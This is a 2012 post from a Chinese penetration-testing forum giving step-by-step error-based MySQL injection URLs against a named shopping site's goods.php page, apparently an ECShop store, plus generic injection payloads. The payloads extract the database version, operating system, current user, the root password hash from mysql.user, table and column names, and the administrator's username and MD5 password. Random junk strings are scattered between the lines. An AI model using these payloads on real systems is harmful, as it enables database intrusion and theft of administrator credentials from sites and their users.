中国网络渗透测试联盟
标题:
盲注详细内容
[打印本页]
作者:
admin
时间:
2012-9-5 14:59
标题:
盲注详细内容
判断版本号
' v4 Y7 A/ G9 |, {7 y, N/ N* p6 p
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 W$ I" s4 \, M$ D. y8 {% a
' w* k. P1 b$ h
判断系统
4 [. u( Z0 }8 t7 L7 X! C' Q
$ u8 h0 e" L' O" Z4 n$ ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 x5 Y4 x* R! U! }' B- ]
! B* C7 d: f) Y% f, w
" X3 B8 X2 [( N5 H
- p, I5 |3 n w7 n; Q+ `
当前 user()
9 F; a/ E+ o) E6 D' M6 h0 M- t
- J( g- h! o0 e z4 q1 G N+ N
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, ]. r u% G* j4 _
" m4 R& z- K+ K
$ B/ f4 g+ ~7 a; r B# x8 j" z
# _% t b/ e# X
当前 database()
8 Y$ g% r+ ^" g
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( c, i1 ~9 H0 Y# S% [; P9 i
/ k# M" n, q7 O7 n: v+ h
2 S( n" H5 d( m& b
" z" S5 X4 b+ C" P# c. i& i2 U
1 E' p8 s9 Q/ z7 J. E; \8 m
root hash
2 V% p2 e* |' }2 }+ O, J
- [2 u, u) M8 \
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' c6 P& r a( u% \) T. l6 G+ y
3 k8 ?8 R0 D. @4 Y0 P) ?
! C" v, D0 f7 e5 @; n/ ^& J
% B/ a$ f2 D* C# P9 e
当前 数据库表名
C& ]; D, e; r
& T) S/ J/ L& p, ~
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ l2 b0 ~3 ^5 c; X) ^
_+ u8 H) W8 K$ M; ^5 B; {5 ?, I: w
) ?# S/ r, T/ h
0 Z `( p- m; Y v7 f, r
当前 数据库 user_name 字段
+ L* ^2 {4 x8 m( t7 l% M2 g7 C' R
( F8 h/ ]# @( |; S: d1 @
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& d! u7 }" @) r8 N B7 R
9 w3 o, B* M D3 |$ ^ e, P' Z9 ~
当前 数据库 字段 password
. @; \1 F1 I- Q1 m1 n' a
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 H: X( K3 p" t$ \. @% ~
* D# ? b; n5 C- |
" J0 j9 o" m/ ~
( @6 {, Z" s. e. g0 l& G+ a% _! N
获得 admin passwd(md5)
7 k9 }( u# y k+ {1 o5 n/ `
6 k2 R* n# z" {) @
6 t6 R8 ~( v$ T( b! ]+ V8 [" Z3 _
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20
(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 Z( [1 A: ^& z
5 a1 s; y$ u+ o8 d% [8 n1 k8 @6 V9 B2 R$ Y! b
报错注射
" `: U, h p* F- R: j6 x
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
* |8 y' q* W% @/ V9 M% f! m* q4 a6 [
~8 V) z" ]% U5 U: v, B0 L) v
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
* H3 |! a. `8 ^
/ T: Q" j( C& N) W* F+ N8 x
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2